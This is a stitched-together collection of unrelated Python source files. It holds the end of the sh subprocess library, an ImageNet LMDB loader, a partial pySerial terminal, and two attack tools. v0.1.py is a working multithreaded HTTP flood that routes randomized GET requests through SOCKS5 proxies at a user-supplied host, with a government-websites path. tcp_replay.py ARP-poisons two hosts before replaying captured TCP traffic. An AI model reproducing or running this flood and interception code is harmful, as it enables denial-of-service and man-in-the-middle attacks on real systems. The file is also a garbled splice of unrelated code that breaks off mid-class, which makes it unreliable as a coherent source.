def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the questions "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except: # noqa: E722
char = chr(4).encode()
# normally, one EOF should be enough to signal to an program
# that is read()ing, to return 0 and be on your way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and not isinstance(chunk, bytes):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk), proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding, decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding, decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
def process(chunk): return False # noqa: E731
def finish(): return None # noqa: E731
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
if getattr(handler, "encoding", None):
def encode(chunk): return chunk.decode(handler.encoding) # noqa: E731
else:
def encode(chunk): return chunk # noqa: E731
if hasattr(handler, "flush"):
flush = handler.flush
else:
def flush(): return None # noqa: E731
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding, decode_errors, pipe_queue=None,
save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding, self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that, first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING, decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, its very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
@contextmanager
def _args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k, v) for k, v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set((
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"StreamBufferer",
"__project_url__",
"__version__",
"__file__",
"_args",
"pushd",
"glob",
"contrib",
))
def __init__(self, globs, baked_args=None):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
super(dict, self).__init__()
self.globs = globs
self.baked_args = baked_args or {}
def __getitem__(self, k):
if k == 'args':
# Let the deprecated '_args' context manager be imported as 'args'
k = '_args'
# if we're trying to import something real, see if it's in our global scope.
# what defines "real" is that it's in our whitelist
if k in self.whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
# this check must come after testing if its a command, because on some
# systems, there are an environment variables that can conflict with
# command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
@staticmethod
def b_cd(path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
@staticmethod
def b_which(program, paths=None):
return which(program, paths)
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(a, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return a, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
@contrib("ssh")
def ssh(orig): # pragma: no cover
""" An ssh command for automatic password login """
class SessionContent(object):
def __init__(self):
self.chars = deque(maxlen=50000)
self.lines = deque(maxlen=5000)
self.line_chars = []
self.last_line = ""
self.cur_char = ""
def append_char(self, char):
if char == "\n":
line = self.cur_line
self.last_line = line
self.lines.append(line)
self.line_chars = []
else:
self.line_chars.append(char)
self.chars.append(char)
self.cur_char = char
@property
def cur_line(self):
line = "".join(self.line_chars)
return line
class SSHInteract(object):
def __init__(self, prompt_match, pass_getter, out_handler, login_success):
self.prompt_match = prompt_match
self.pass_getter = pass_getter
self.out_handler = out_handler
self.login_success = login_success
self.content = SessionContent()
# some basic state
self.pw_entered = False
self.success = False
def __call__(self, char, stdin):
self.content.append_char(char)
if self.pw_entered and not self.success:
self.success = self.login_success(self.content)
if self.success:
return self.out_handler(self.content, stdin)
if self.prompt_match(self.content):
password = self.pass_getter()
stdin.put(password + "\n")
self.pw_entered = True
def process(a, kwargs):
real_out_handler = kwargs.pop("interact")
password = kwargs.pop("password", None)
login_success = kwargs.pop("login_success", None)
prompt_match = kwargs.pop("prompt", None)
prompt = "Please enter SSH password: "
if prompt_match is None:
def prompt_match(content): return content.cur_line.endswith("password: ") # noqa: E731
if password is None:
def pass_getter(): return getpass.getpass(prompt=prompt) # noqa: E731
else:
def pass_getter(): return password.rstrip("\n") # noqa: E731
if login_success is None:
def login_success(content): return True # noqa: E731
kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success)
return a, kwargs
cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process)
return cmd
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except: # noqa: E722
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args=None):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
super(SelfWrapper, self).__init__(
name=getattr(self_module, '__name__', None),
doc=getattr(self_module, '__doc__', None)
)
for attr in ["__builtins__", "__file__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
# Copy the Command class and add any baked call kwargs to it
cls_attrs = Command.__dict__.copy()
if baked_args:
call_args, _ = Command._extract_call_args(baked_args)
cls_attrs['_call_args'] = cls_attrs['_call_args'].copy()
cls_attrs['_call_args'].update(call_args)
command_cls = type(Command.__name__, Command.__bases__, cls_attrs)
globs = globals().copy()
globs[Command.__name__] = command_cls
self.__env = Environment(globs, baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
# this is very brittle and pretty much a sin. but it works in 99% of
# the time and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
try:
code = parent[4][0].strip()
except TypeError:
# On the REPL or from the commandline, we don't get the source code in the
# top stack frame
# Older versions of pypy don't set parent[1] the same way as CPython or newer versions
# of Pypy so we have to special case that too.
if parent[1] in ('<stdin>', '<string>') or (
parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'):
# This depends on things like Python's calling convention and the layout of stack
# frames but it's a fix for a bug in a very cornery cornercase so....
module_name = parent[0].f_code.co_names[-1]
else:
raise
else:
parsed = ast.parse(code)
try:
module_name = parsed.body[0].targets[0].id
except Exception:
# Diagnose what went wrong
if not isinstance(parsed.body[0], ast.Assign):
raise RuntimeError("A new execution context must be assigned to a variable")
raise
if module_name == __name__:
raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__)
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer_cls):
try:
return importer_cls.__class__.__name__ == ModuleImporterFromVariables.__name__
except AttributeError:
# ran into importer which is not a class instance
return False
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(restrict_to=[SelfWrapper.__name__], )
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
if parent_frame and parent_frame.f_code.co_name == "find_spec":
parent_frame = parent_frame.f_back
while parent_frame and in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# Calling PyImport_ImportModule("some_module"); via the C API may not
# have a parent frame. Early-out to avoid in_importlib() trying to
# get f_code from None when looking for 'some_module'.
# This also happens when using gevent apparently.
if not parent_frame:
return None
# this line is saying "hey, does mod_fullname exist as a name we've
# defined previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def find_spec(self, fullname, path=None, target=None):
""" find_module() is deprecated since Python 3.4 in favor of find_spec() """
from importlib.machinery import ModuleSpec
found = self.find_module(fullname, path)
return ModuleSpec(fullname, found) if found is not None else None
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
if __name__ == "__main__": # pragma: no cover
# we're being run as a stand-alone script
env = Environment(globals())
run_repl(env)
else:
# we're being imported from somewhere
sys.modules[__name__] = SelfWrapper(sys.modules[__name__])
register_importer()
|
v0.1.py
|
from random_user_agent.user_agent import UserAgent
import threading
import random
import logging
import socket
import socks
import sys
import ssl
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S",
level=logging.INFO
)
active_threads = 0
max_threads = 777
usera = UserAgent()
proxy_list = open("socks5_list.txt", "r")
proxies = proxy_list.readlines()
chars = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
chars_list = chars
context = ssl.create_default_context()
def hflood(host, port, proxy_host, proxy_port, timeout=5, https=False):
try:
global active_threads
active_threads += 1
sock = socks.socksocket()
sock.settimeout(timeout)
sock.set_proxy(socks.SOCKS5, proxy_host, int(proxy_port))
sock.connect((host, port))
if https:
sock = context.wrap_socket(sock, server_hostname=host)
while True:
list_param = random.choices(chars_list, k=77)
params = "".join(list_param)
ua = usera.get_random_user_agent()
http = f"GET /lists/government-websites/?{params} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {ua}\r\n\r\n"
send = sock.send(http.encode())
print(f"Sent {send} bytes of data")
print(sock.recv(100))
except Exception as e:
logging.debug(f"hflood error: {e}")
pass
finally:
active_threads -= 1
host = input("Host: ")
port = int(input("Port: "))
while True:
for proxy in proxies:
proxy = proxy.strip()
proxy_host, proxy_port = proxy.split(":")
while True:
if active_threads >= max_threads:
continue
logging.debug(f"Starting thread with {proxy_host} proxy")
threading.Thread(target=hflood, args=[host, port, proxy_host, proxy_port, 10], daemon=True).start()
break
|
tcp_replay.py
|
from time import time
import threading
from scapy.all import *
from .Client import Client, NetAttrs
from .arp_poison import arp_poison
FIN = 0x01
SYN = 0x02
PSH = 0x08
ACK = 0x10
URG = 0x20
ECE = 0x40
CWR = 0x80
backlog_queue = []
lock = threading.Lock()
running = True
def replay_usage(exit_num=None):
usg = ""
usg += "Requires: Server/Client IP, PCAP Interface"
print(usg)
def sniffer(src, dst):
global backlog_queue, lock, running
passed = int(time() * 1000)
locall = []
while running:
lock.acquire()
t = sniff(iface=intface,
count=1,
lfilter=lambda x: x.haslayer(TCP) and x[IP].src == dst.ip and
x[IP].dst == src.ip)[0]
locall.append(t)
curr = int(time() * 1000)
if passed - curr > 1000:
passed = curr
backlog_queue = backlog_queue + locall
lock.release()
def rcv_valid(t, rcv):
return t.ip == rcv.ip
def replay(client, src, dst, conversation):
global backlog_queue, lock, running
pos = 0
msg = conversation.pop(0)
while conversation:
if msg[IP].src == src.ip:
sendp(msg, iface=client.intface)
elif msg[IP].src == dst.ip:
lock.acquire()
if not rcv_valid(backlog_queue.pop(0), msg):
print('ERROR: unexpected recieve at position {}'.format(pos))
running = False
return False
lock.release()
pos += 1
msg = conversation.pop(0) if conversation else []
running = True
return True
# filter pcap for tcp messages from client and server
def pcap_filter(pcap, src, dst):
conversation = []
for packet in pcap:
if packet.haslayer(TCP):
s_to_d = packet[IP].src == src.ip and packet[IP].dst == dst.ip
d_to_s = packet[IP].src == dst.ip and packet[IP].dst == src.ip
if s_to_d and d_to_s:
conversation.append(packet)
return conversation
def tcp_replay(client, src, dst):
pcap = input('Enter pcap or show to see options: ')
while 'show' == pcap:
print("Pcaps : {}".format(', '.join(client.pcaps.keys())))
pcap = input('Enter pcap or show to see options: ')
client.update(['pcap:', pcap], forced=True)
conversation = pcap_filter(client.pcaps[pcap], src, dst)
arp_poison(client, src, dst)
threading.Thread(target=sniffer, args=(src, dst,)).start()
if replay(client, src, dst, conversation):
print('Replay successful')
|
imagenet.py
|
from . import lmdb_datasets
from torchvision import datasets, transforms
import os
import os.path as osp
import torch.utils.data
import numpy as np
import cv2
from . import lmdb_data_pb2 as pb2
import Queue
import time
import multiprocessing
DATASET_SIZE = 100
mean = np.array([[[0.485]], [[0.456]], [[0.406]]]) * 255
std = np.array([[[0.229]], [[0.224]], [[0.225]]]) * 255
class Imagenet_LMDB(lmdb_datasets.LMDB):
def __init__(self, imagenet_dir, train=False):
self.train_name = 'imagenet_train_lmdb'
self.val_name = 'imagenet_val_lmdb'
self.train = train
super(Imagenet_LMDB, self).__init__(osp.join(imagenet_dir, train and self.train_name or self.val_name))
txn = self.env.begin()
self.cur = txn.cursor()
self.data = Queue.Queue(DATASET_SIZE * 2)
self.target = Queue.Queue(DATASET_SIZE * 2)
self.point = 0
# self._read_from_lmdb()
def data_transfrom(self, data, other):
data = data.astype(np.float32)
if self.train:
shape = np.fromstring(other[0], np.uint16)
data = data.reshape(shape)
# Random crop
_, w, h = data.shape
x1 = np.random.randint(0, w - 224)
y1 = np.random.randint(0, h - 224)
data = data[:, x1:x1 + 224, y1:y1 + 224]
# HorizontalFlip
# TODO horizontal flip
else:
data = data.reshape([3, 224, 224])
data = (data - mean) / std
tensor = torch.Tensor(data)
del data
return tensor
def target_transfrom(self, target):
return target
def _read_from_lmdb(self):
self.cur.next()
if not self.cur.key():
self.cur.first()
dataset = pb2.Dataset().FromString(self.cur.value())
for datum in dataset.datums:
data = np.fromstring(datum.data, np.uint8)
try:
data = self.data_transfrom(data, datum.other)
except:
print
'cannot trans ', data.shape
continue
target = int(datum.target)
target = self.target_transfrom(target)
self.data.put(data)
self.target.put(target)
# print 'read_from_lmdb', time.time()-r
del dataset
# def read_from_lmdb(self):
# process=multiprocessing.Process(target=self._read_from_lmdb)
# process.start()
def __getitem__(self, index):
if self.data.qsize() < DATASET_SIZE:
self._read_from_lmdb()
data, target = self.data.get(), self.target.get()
return data, target
def __len__(self):
return self.env.stat()['entries'] * DATASET_SIZE
def Imagenet_LMDB_generate(imagenet_dir, output_dir, make_val=False, make_train=False):
# the imagenet_dir should have direction named 'train' or 'val',with 1000 folders of raw jpeg photos
train_name = 'imagenet_train_lmdb'
val_name = 'imagenet_val_lmdb'
def target_trans(target):
return target
if make_val:
val_lmdb = lmdb_datasets.LMDB_generator(osp.join(output_dir, val_name))
def trans_val_data(dir):
tensor = transforms.Compose([
transforms.Scale(256),
transforms.CenterCrop(224),
transforms.ToTensor()
])(dir)
tensor = (tensor.numpy() * 255).astype(np.uint8)
return tensor
val = datasets.ImageFolder(osp.join(imagenet_dir, 'val'), trans_val_data, target_trans)
val_lmdb.write_classification_lmdb(val, num_per_dataset=DATASET_SIZE)
if make_train:
train_lmdb = lmdb_datasets.LMDB_generator(osp.join(output_dir, train_name))
def trans_train_data(dir):
tensor = transforms.Compose([
transforms.Scale(256),
transforms.ToTensor()
])(dir)
tensor = (tensor.numpy() * 255).astype(np.uint8)
return tensor
train = datasets.ImageFolder(osp.join(imagenet_dir, 'train'), trans_train_data, target_trans)
train.imgs = np.random.permutation(train.imgs)
train_lmdb.write_classification_lmdb(train, num_per_dataset=DATASET_SIZE, write_shape=True)
|
miniterm.py
|
#!/usr/bin/env python
# Edited by Pedro Sidra <pedrosidra0@gmail.com> for use in personal project
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2020 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
if text=="\b":
text="\b \b"
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
